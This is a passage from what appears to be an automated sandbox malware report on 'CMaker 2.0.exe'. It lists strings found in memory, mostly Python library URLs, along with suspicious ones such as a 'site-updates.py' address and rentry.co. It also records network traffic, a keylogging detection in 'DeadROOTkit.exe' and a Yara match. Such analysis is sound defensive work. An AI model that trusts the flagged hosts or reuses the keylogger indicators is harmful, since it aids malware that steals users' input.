00000005.00000003.2232547754.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                        Source: CMaker 2.0.exe, 00000005.00000003.2176043917.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257904597.0000022D34F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                        Source: CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176104183.0000022D3514D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236511528.0000022D35151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                        Source: powershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: CMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                        Source: CMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
                        Source: CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256074496.0000022D34688000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                        Source: CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                        Source: CMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                        Source: CMaker 2.0.exe, 00000005.00000003.2170943791.0000022D34AD9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170622659.0000022D34D5E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2246985261.0000022D34AC2000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172194945.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256607534.0000022D34AC2000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236343248.0000022D34ABF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234194053.0000022D34AB7000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225465109.0000022D34AB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                        Source: CMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                        Source: CMaker 2.0.exe, 00000005.00000003.2176043917.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257904597.0000022D34F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                        Source: CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236209518.0000022D34CCA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                        Source: CMaker 2.0.exe, 00000005.00000002.2259985977.0000022D35440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                        Source: powershell.exe, 00000009.00000002.2322203406.000001DE65B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234484698.0000022D3510F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230378371.0000022D3510B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2258311843.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228996872.0000022D3510A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241420000.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                        Source: CMaker 2.0.exe, 00000005.00000003.2234484698.0000022D3510F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230378371.0000022D3510B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2258311843.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228996872.0000022D3510A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241420000.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                        Source: CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                        Source: CMaker 2.0.exe, 00000005.00000003.2236745632.0000022D3511A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235901108.0000022D3511A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234607655.0000022D35118000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                        Source: CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                        Source: CMaker 2.0.exe, 00000005.00000003.2225582122.0000022D351CE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228425828.0000022D35248000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                        Source: CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172590680.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D1A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2169942092.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170682485.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172993769.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170407561.0000022D34D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
                        Source: CMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
                        Source: CMaker 2.0.exe, 00000005.00000003.2231103270.0000022D350EE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257252361.0000022D34D4E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                        Source: CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176670133.0000022D351CE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229450636.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34D64000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
                        Source: powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: CMaker 2.0.exe, 00000005.00000002.2256796014.0000022D34B40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                        Source: CMaker 2.0.exe, 00000005.00000002.2262592946.00007FFD8FB3B000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
                        Source: CMaker 2.0.exe, 00000005.00000002.2256796014.0000022D34B40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://rentry.co
                        Source: CMaker 2.0.exe, 00000005.00000002.2256796014.0000022D34B40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/
                        Source: CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172590680.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D1A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2169942092.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170682485.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172993769.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170407561.0000022D34D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
                        Source: CMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.ioP
                        Source: CMaker 2.0.exe, 00000005.00000003.2239700913.0000022D34AAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234513191.0000022D34AA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2239428918.0000022D34AAC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232148885.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2239829401.0000022D34AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                        Source: CMaker 2.0.exe, 00000005.00000003.2176104183.0000022D35156000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                        Source: CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                        Source: CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                        Source: CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156350024.00000218C018E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2156227950.00000218C018E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
                        Source: CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2262533228.00007FFD8F789000.00000004.00000001.01000000.00000011.sdmp, CMaker 2.0.exe, 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.openssl.org/H
                        Source: CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172590680.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176150111.0000022D34D09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D1A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34D0B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2169942092.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170682485.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172993769.0000022D34D0C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170407561.0000022D34D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                        Source: CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176670133.0000022D351CE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229450636.0000022D34D66000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34D64000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                        Source: CMaker 2.0.exe, 00000005.00000002.2256074496.0000022D34600000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168528887.0000022D34B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                        Source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2262592946.00007FFD8FBD8000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.python.org/psf/license/
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228360030.0000022D35308000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227580018.0000022D352F0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227665818.0000022D3531F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226979229.0000022D3531E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                        Source: CMaker 2.0.exe, 00000005.00000003.2234484698.0000022D3510F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230378371.0000022D3510B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2258311843.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228996872.0000022D3510A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241420000.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231985007.0000022D3510B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to log keystrokes (.Net Source)
                        Source: DeadROOTkit.exe.4.dr, XLogger.cs.Net Code: KeyboardLayout
                        Source: 4.2.1.exe.2ff5330.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
